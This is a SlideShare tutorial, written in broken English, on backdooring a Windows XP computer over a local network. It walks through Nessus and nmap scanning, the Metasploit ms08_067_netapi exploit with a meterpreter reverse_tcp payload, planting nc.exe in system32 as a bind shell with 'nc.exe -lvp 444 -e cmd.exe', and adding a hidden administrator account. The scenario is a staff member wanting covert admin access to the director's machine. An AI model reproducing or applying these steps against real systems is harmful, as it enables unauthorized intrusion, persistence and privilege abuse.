SlideShare una empresa de Scribd logo
1 de 8
Descargar para leer sin conexión
Backdor Nectcat With Smb

OS2C jogja (30/1-2012/02:29PM)- good morning, a right now we will exploit a
computer system the victim with IP address 172.18.10.4. we and victim be local
area network on equal. There Ip attacker 172.18.10.5 and other computer up with ip
172.18.10.1. so there we have 3 unit computer to LAN.

The ensuing structur skenario network :




The Scenario attacker used methode is hacker or attacker a delegate statf, while
attacker recived order form staf to the add user acount on computer director with
level as administrators acount director. In order to statf can acsess computer
director, upon office onely a statf can using login to computer director.

Oke the next, author begin technique how to add user to computer director with
used explot smb. Now attacker need tool aplication to get information a
victim(computer director). There we used nessus to find and search port, services
and vulnerbility application on computer, possible can to hole as do attacker exploit
computer target. The below we can see web application nessus.
the next we add ip target as object scan to know and find service and port open are
hole exploit computer target. To form the below must input information name
target, type (run now) and policy with choose internal network scan.




After we seting ip target next clik button scan launch scan now proses scanning
running, we waiting ouput scan information about computer victim.




Now information port, service and protocol to computer target we get. The next we
can know continue about description about all service. Now we choose protocol tcp
with port 139 is server message protocol to show info detail, the equal is picture
screenshoot information smb.
nmap -A 172.18.10.4
We can get information used other scan likes scanner via console is NMAP, the use
diffrent nmap and nessus a http://nmap.org ) at 2012-01-30 open port and servcie
 Starting Nmap 5.61TEST4 ( operation searching and finding
 07:15 AFT
with via console. For example using nmap :
 Nmap scan report for 172.18.10.4
 Host is up (0.0019s latency).
 Not shown: 997 closed ports
 PORT STATE SERVICE         VERSION
 135/tcp open msrpc        Microsoft Windows RPC
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds Microsoft Windows XP microsoft-
 ds
 MAC Address: 08:00:27:94:14:34 (Cadmus Computer
 Systems)
 Device type: general purpose
 Running: Microsoft Windows XP
 OS CPE: cpe:/o:microsoft:windows_xp
 OS details: Microsoft Windows XP SP2 or SP3
 Network Distance: 1 hop
 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: KITNET-02, NetBIOS user:
<unknown>, NetBIOS MAC: 08:00:27:94:14:34 (Cadmus
Computer Systems)
| smb-security-mode:
| Account that was used for smb scripts: guest
| User-level authentication
| SMB Security: Challenge/response passwords supported
|_ Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| Computer name: kitnet-02
| NetBIOS computer name: KITNET-02
| Workgroup: WORKGROUP
|_ System time: 2012-01-30 07:15:26 UTC-8

TRACEROUTE
HOP RTT   ADDRESS
1 1.95 ms 172.18.10.4

OS and Service detection performed. Please report any
incorrect results at http://nmap.org/submit/ .
Near also we can see kind infomation uses nessus to nmap, but with nmap dont
have description, plugin, pid and solution. Now will exploit computer target :




Above picture is metaspolit, here attacker uses exploit framework3 on the
backtrack 4 r2. The next we use exploit smb. We user exploit server mail block
protocol(smb) with kind exploit exploit/windows/smb/ms08_067_netapi. And
next    we    applying  payloads    to   smb    using   payload   meterpreter,
windows/meterpreter/reverce_tcp and and we insert host target and host
attacker. While set RHOST is input to host target and set LHOST input to host
attacker.
And we have backdor will send bacdor to computer target.




After we include host target and host attacker and know located file backdor to
send computer target, furthermore we do exploit.




Now computer direcotor or target wass exploit, through meterperter we can do
upload and download file to located computer target. As image upon we can show
technique upload file backdor to file system32 windows. Upon we type commad
exploit computer attacker was sucsess on system32 computer target. And now
attacker running file backdor nc.exe to command line computer target.




Proses listening to port 444 while running. Command nc.exe –lvp 444 –e cmd.exe
mind file backdor run –l is listening to –p port 444, to port here attacker used port
444. Using port up to attacker can used port, 999,888, or 555. And command –v
backdor runing mode verbose (use twice to be more verbose).




Now this is mission add user to computer target, atttacker add name user to
computer targer wiht new user statf password: passtatf. And we can see new user
wass add to computer.




The next attacker same level access betwen acount director and statf. As picture
below we can show succses make start level administrators.
And the last computer start trying running nc through he computer, to sure know he
has have acoutn to computer director. TRADANGggg..... success complete the
mission a attacker on the jobs.
80133823 backdor-nectcat-through-smb

Más contenido relacionado

La actualidad más candente

Netcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaNetcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beema
Raghunath G
 
Module 4 Enumeration
Module 4   EnumerationModule 4   Enumeration
Module 4 Enumeration
leminhvuong
 

La actualidad más candente (19)

Sniffing in a Switched Network
Sniffing in a Switched NetworkSniffing in a Switched Network
Sniffing in a Switched Network
 
New School Man-in-the-Middle
New School Man-in-the-MiddleNew School Man-in-the-Middle
New School Man-in-the-Middle
 
Best!
Best!Best!
Best!
 
Netcat
NetcatNetcat
Netcat
 
Netcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beemaNetcat 101 by-mahesh-beema
Netcat 101 by-mahesh-beema
 
Analyzing network packets Using Wireshark
Analyzing network packets Using WiresharkAnalyzing network packets Using Wireshark
Analyzing network packets Using Wireshark
 
Nmap
NmapNmap
Nmap
 
Ch 5: Port Scanning
Ch 5: Port ScanningCh 5: Port Scanning
Ch 5: Port Scanning
 
Breaking ssl
Breaking sslBreaking ssl
Breaking ssl
 
Ping
PingPing
Ping
 
Tcpdump
TcpdumpTcpdump
Tcpdump
 
Ethical hacking Chapter 6 - Port Scanning - Eric Vanderburg
Ethical hacking   Chapter 6 - Port Scanning - Eric VanderburgEthical hacking   Chapter 6 - Port Scanning - Eric Vanderburg
Ethical hacking Chapter 6 - Port Scanning - Eric Vanderburg
 
Module 4 Enumeration
Module 4   EnumerationModule 4   Enumeration
Module 4 Enumeration
 
Network scanning with nmap
Network scanning with nmapNetwork scanning with nmap
Network scanning with nmap
 
PandoraFMS: Free Monitoring System
PandoraFMS: Free Monitoring SystemPandoraFMS: Free Monitoring System
PandoraFMS: Free Monitoring System
 
Ftp server configuration on cisco packet tracer
Ftp server configuration on cisco packet tracerFtp server configuration on cisco packet tracer
Ftp server configuration on cisco packet tracer
 
Cisco Router Security
Cisco Router SecurityCisco Router Security
Cisco Router Security
 
DNS server configuration in packet tracer
DNS server configuration in packet tracerDNS server configuration in packet tracer
DNS server configuration in packet tracer
 
Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178Hack The Box Nest 10.10.10.178
Hack The Box Nest 10.10.10.178
 

Destacado

The Death of TV? Hardly...
The Death of TV? Hardly...The Death of TV? Hardly...
The Death of TV? Hardly...
Steve Weaver
 
1457894739192-Obsessive-Compulsive Symptoms in Schizophrenia
1457894739192-Obsessive-Compulsive Symptoms in Schizophrenia  1457894739192-Obsessive-Compulsive Symptoms in Schizophrenia
1457894739192-Obsessive-Compulsive Symptoms in Schizophrenia
Dr Aneel Kumar
 
Front Page
Front PageFront Page
Front Page
agelso
 
Commnunication ports and memory card chapter 1
Commnunication ports and memory card chapter 1Commnunication ports and memory card chapter 1
Commnunication ports and memory card chapter 1
Mukesh Thakur
 
พระราชบัญญัติ
พระราชบัญญัติพระราชบัญญัติ
พระราชบัญญัติ
hong11120
 
Awal sebelum membeli rumah
Awal sebelum membeli rumahAwal sebelum membeli rumah
Awal sebelum membeli rumah
Rahmatian Zaleh
 
Vacanze studio edimburgo 2008
Vacanze studio edimburgo 2008Vacanze studio edimburgo 2008
Vacanze studio edimburgo 2008
dany
 
Mwise Portfolio
Mwise PortfolioMwise Portfolio
Mwise Portfolio
mwise921
 
Aplikasi Skype dalam P&P Teknologi Maklumat tingkatan 4
Aplikasi Skype dalam P&P Teknologi Maklumat tingkatan 4Aplikasi Skype dalam P&P Teknologi Maklumat tingkatan 4
Aplikasi Skype dalam P&P Teknologi Maklumat tingkatan 4
Yuyu Wahida
 
Game theory 11
Game theory 11Game theory 11
Game theory 11
poundza
 

Destacado (20)

Turst
TurstTurst
Turst
 
SyncNI Magazine Spring 2012
SyncNI Magazine Spring 2012SyncNI Magazine Spring 2012
SyncNI Magazine Spring 2012
 
The Death of TV? Hardly...
The Death of TV? Hardly...The Death of TV? Hardly...
The Death of TV? Hardly...
 
1457894739192-Obsessive-Compulsive Symptoms in Schizophrenia
1457894739192-Obsessive-Compulsive Symptoms in Schizophrenia  1457894739192-Obsessive-Compulsive Symptoms in Schizophrenia
1457894739192-Obsessive-Compulsive Symptoms in Schizophrenia
 
Design process
Design processDesign process
Design process
 
Front Page
Front PageFront Page
Front Page
 
LGO Presentation (25.1.2012)
LGO Presentation (25.1.2012)LGO Presentation (25.1.2012)
LGO Presentation (25.1.2012)
 
Onalytica-CyberSecurity-2015-Top-100-Influencers-And-Brands
Onalytica-CyberSecurity-2015-Top-100-Influencers-And-BrandsOnalytica-CyberSecurity-2015-Top-100-Influencers-And-Brands
Onalytica-CyberSecurity-2015-Top-100-Influencers-And-Brands
 
Commnunication ports and memory card chapter 1
Commnunication ports and memory card chapter 1Commnunication ports and memory card chapter 1
Commnunication ports and memory card chapter 1
 
พระราชบัญญัติ
พระราชบัญญัติพระราชบัญญัติ
พระราชบัญญัติ
 
Awal sebelum membeli rumah
Awal sebelum membeli rumahAwal sebelum membeli rumah
Awal sebelum membeli rumah
 
Vacanze studio edimburgo 2008
Vacanze studio edimburgo 2008Vacanze studio edimburgo 2008
Vacanze studio edimburgo 2008
 
Mwise Portfolio
Mwise PortfolioMwise Portfolio
Mwise Portfolio
 
Aplikasi Skype dalam P&P Teknologi Maklumat tingkatan 4
Aplikasi Skype dalam P&P Teknologi Maklumat tingkatan 4Aplikasi Skype dalam P&P Teknologi Maklumat tingkatan 4
Aplikasi Skype dalam P&P Teknologi Maklumat tingkatan 4
 
Fall2010 quinnedu261syllabus
Fall2010 quinnedu261syllabusFall2010 quinnedu261syllabus
Fall2010 quinnedu261syllabus
 
Scaling Data Servers via Cooperative Caching
Scaling Data Servers via Cooperative CachingScaling Data Servers via Cooperative Caching
Scaling Data Servers via Cooperative Caching
 
Game theory 11
Game theory 11Game theory 11
Game theory 11
 
Scala @ soundcloud [scaladores]
Scala @ soundcloud [scaladores]Scala @ soundcloud [scaladores]
Scala @ soundcloud [scaladores]
 
Program Engagement Power. Programs Do Affect Ad Engagement
Program Engagement Power.  Programs Do Affect Ad EngagementProgram Engagement Power.  Programs Do Affect Ad Engagement
Program Engagement Power. Programs Do Affect Ad Engagement
 
Electronic voting-system
Electronic voting-systemElectronic voting-system
Electronic voting-system
 

Similar a 80133823 backdor-nectcat-through-smb

Client side exploits
Client side exploitsClient side exploits
Client side exploits
nickyt8
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
Amanpreet Singh
 
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdfFigure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
orderfabfirki
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
Karen Oliver
 
Lab3 advanced port scanning 30 oct 21
Lab3 advanced port scanning 30 oct 21Lab3 advanced port scanning 30 oct 21
Lab3 advanced port scanning 30 oct 21
Hussain111321
 
Lab-5 Scanning and Enumeration Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration        Reconnaissance and inform.docxLab-5 Scanning and Enumeration        Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration Reconnaissance and inform.docx
LaticiaGrissomzz
 

Similar a 80133823 backdor-nectcat-through-smb (20)

The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
Saad baig practical file
Saad baig practical fileSaad baig practical file
Saad baig practical file
 
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
 
Security & ethical hacking
Security & ethical hackingSecurity & ethical hacking
Security & ethical hacking
 
Security & ethical hacking p2
Security & ethical hacking p2Security & ethical hacking p2
Security & ethical hacking p2
 
Information gathering using windows command line utility
Information gathering using windows command line utilityInformation gathering using windows command line utility
Information gathering using windows command line utility
 
Interview questions
Interview questionsInterview questions
Interview questions
 
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdfFigure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
Figure 3 TCP Session Hijacking Attack victims to execute the mali.pdf
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Netcat - 101 Swiss Army Knife
Netcat - 101 Swiss Army KnifeNetcat - 101 Swiss Army Knife
Netcat - 101 Swiss Army Knife
 
Unveiling-Patchwork
Unveiling-PatchworkUnveiling-Patchwork
Unveiling-Patchwork
 
04-post-connection-attacks.pdf
04-post-connection-attacks.pdf04-post-connection-attacks.pdf
04-post-connection-attacks.pdf
 
Complete MPICH2 Clustering Manual in Ubuntu
Complete MPICH2 Clustering Manual in UbuntuComplete MPICH2 Clustering Manual in Ubuntu
Complete MPICH2 Clustering Manual in Ubuntu
 
Network Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain EssayNetwork Vulnerabilities And Cyber Kill Chain Essay
Network Vulnerabilities And Cyber Kill Chain Essay
 
G3t R00t at IUT
G3t R00t at IUTG3t R00t at IUT
G3t R00t at IUT
 
An Express Guide ~ SNMP for Secure Rremote Resource Monitoring
An Express Guide ~ SNMP for Secure Rremote Resource MonitoringAn Express Guide ~ SNMP for Secure Rremote Resource Monitoring
An Express Guide ~ SNMP for Secure Rremote Resource Monitoring
 
Lab3 advanced port scanning 30 oct 21
Lab3 advanced port scanning 30 oct 21Lab3 advanced port scanning 30 oct 21
Lab3 advanced port scanning 30 oct 21
 
Lab-5 Scanning and Enumeration Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration        Reconnaissance and inform.docxLab-5 Scanning and Enumeration        Reconnaissance and inform.docx
Lab-5 Scanning and Enumeration Reconnaissance and inform.docx
 

Último

Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Krashi Coaching
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
ciinovamais
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
kauryashika82
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi  6.pdf1029-Danh muc Sach Giao Khoa khoi  6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
QucHHunhnh
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 -  Danh muc Sach Giao Khoa 10 . pdf1029 -  Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
QucHHunhnh
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
heathfieldcps1
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
PECB
 

Último (20)

Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104
 
General AI for Medical Educators April 2024
General AI for Medical Educators April 2024General AI for Medical Educators April 2024
General AI for Medical Educators April 2024
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in DelhiRussian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
Russian Escort Service in Delhi 11k Hotel Foreigner Russian Call Girls in Delhi
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi  6.pdf1029-Danh muc Sach Giao Khoa khoi  6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
 
Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..Sports & Fitness Value Added Course FY..
Sports & Fitness Value Added Course FY..
 
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
Mattingly "AI & Prompt Design: Structured Data, Assistants, & RAG"
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot Graph
 
Holdier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdfHoldier Curriculum Vitae (April 2024).pdf
Holdier Curriculum Vitae (April 2024).pdf
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and Mode
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdf
 
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
 
microwave assisted reaction. General introduction
microwave assisted reaction. General introductionmicrowave assisted reaction. General introduction
microwave assisted reaction. General introduction
 
1029 - Danh muc Sach Giao Khoa 10 . pdf
1029 -  Danh muc Sach Giao Khoa 10 . pdf1029 -  Danh muc Sach Giao Khoa 10 . pdf
1029 - Danh muc Sach Giao Khoa 10 . pdf
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdf
 
The basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptxThe basics of sentences session 2pptx copy.pptx
The basics of sentences session 2pptx copy.pptx
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 

80133823 backdor-nectcat-through-smb

  • 1. Backdor Nectcat With Smb OS2C jogja (30/1-2012/02:29PM)- good morning, a right now we will exploit a computer system the victim with IP address 172.18.10.4. we and victim be local area network on equal. There Ip attacker 172.18.10.5 and other computer up with ip 172.18.10.1. so there we have 3 unit computer to LAN. The ensuing structur skenario network : The Scenario attacker used methode is hacker or attacker a delegate statf, while attacker recived order form staf to the add user acount on computer director with level as administrators acount director. In order to statf can acsess computer director, upon office onely a statf can using login to computer director. Oke the next, author begin technique how to add user to computer director with used explot smb. Now attacker need tool aplication to get information a victim(computer director). There we used nessus to find and search port, services and vulnerbility application on computer, possible can to hole as do attacker exploit computer target. The below we can see web application nessus.
  • 2. the next we add ip target as object scan to know and find service and port open are hole exploit computer target. To form the below must input information name target, type (run now) and policy with choose internal network scan. After we seting ip target next clik button scan launch scan now proses scanning running, we waiting ouput scan information about computer victim. Now information port, service and protocol to computer target we get. The next we can know continue about description about all service. Now we choose protocol tcp with port 139 is server message protocol to show info detail, the equal is picture screenshoot information smb.
  • 3. nmap -A 172.18.10.4 We can get information used other scan likes scanner via console is NMAP, the use diffrent nmap and nessus a http://nmap.org ) at 2012-01-30 open port and servcie Starting Nmap 5.61TEST4 ( operation searching and finding 07:15 AFT with via console. For example using nmap : Nmap scan report for 172.18.10.4 Host is up (0.0019s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn 445/tcp open microsoft-ds Microsoft Windows XP microsoft- ds MAC Address: 08:00:27:94:14:34 (Cadmus Computer Systems) Device type: general purpose Running: Microsoft Windows XP OS CPE: cpe:/o:microsoft:windows_xp OS details: Microsoft Windows XP SP2 or SP3 Network Distance: 1 hop Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_nbstat: NetBIOS name: KITNET-02, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:94:14:34 (Cadmus Computer Systems) | smb-security-mode: | Account that was used for smb scripts: guest | User-level authentication | SMB Security: Challenge/response passwords supported |_ Message signing disabled (dangerous, but default) |_smbv2-enabled: Server doesn't support SMBv2 protocol | smb-os-discovery: | OS: Windows XP (Windows 2000 LAN Manager) | Computer name: kitnet-02 | NetBIOS computer name: KITNET-02 | Workgroup: WORKGROUP |_ System time: 2012-01-30 07:15:26 UTC-8 TRACEROUTE HOP RTT ADDRESS 1 1.95 ms 172.18.10.4 OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
  • 4. Near also we can see kind infomation uses nessus to nmap, but with nmap dont have description, plugin, pid and solution. Now will exploit computer target : Above picture is metaspolit, here attacker uses exploit framework3 on the backtrack 4 r2. The next we use exploit smb. We user exploit server mail block protocol(smb) with kind exploit exploit/windows/smb/ms08_067_netapi. And next we applying payloads to smb using payload meterpreter, windows/meterpreter/reverce_tcp and and we insert host target and host attacker. While set RHOST is input to host target and set LHOST input to host attacker.
  • 5. And we have backdor will send bacdor to computer target. After we include host target and host attacker and know located file backdor to send computer target, furthermore we do exploit. Now computer direcotor or target wass exploit, through meterperter we can do upload and download file to located computer target. As image upon we can show technique upload file backdor to file system32 windows. Upon we type commad
  • 6. exploit computer attacker was sucsess on system32 computer target. And now attacker running file backdor nc.exe to command line computer target. Proses listening to port 444 while running. Command nc.exe –lvp 444 –e cmd.exe mind file backdor run –l is listening to –p port 444, to port here attacker used port 444. Using port up to attacker can used port, 999,888, or 555. And command –v backdor runing mode verbose (use twice to be more verbose). Now this is mission add user to computer target, atttacker add name user to computer targer wiht new user statf password: passtatf. And we can see new user wass add to computer. The next attacker same level access betwen acount director and statf. As picture below we can show succses make start level administrators.
  • 7. And the last computer start trying running nc through he computer, to sure know he has have acoutn to computer director. TRADANGggg..... success complete the mission a attacker on the jobs.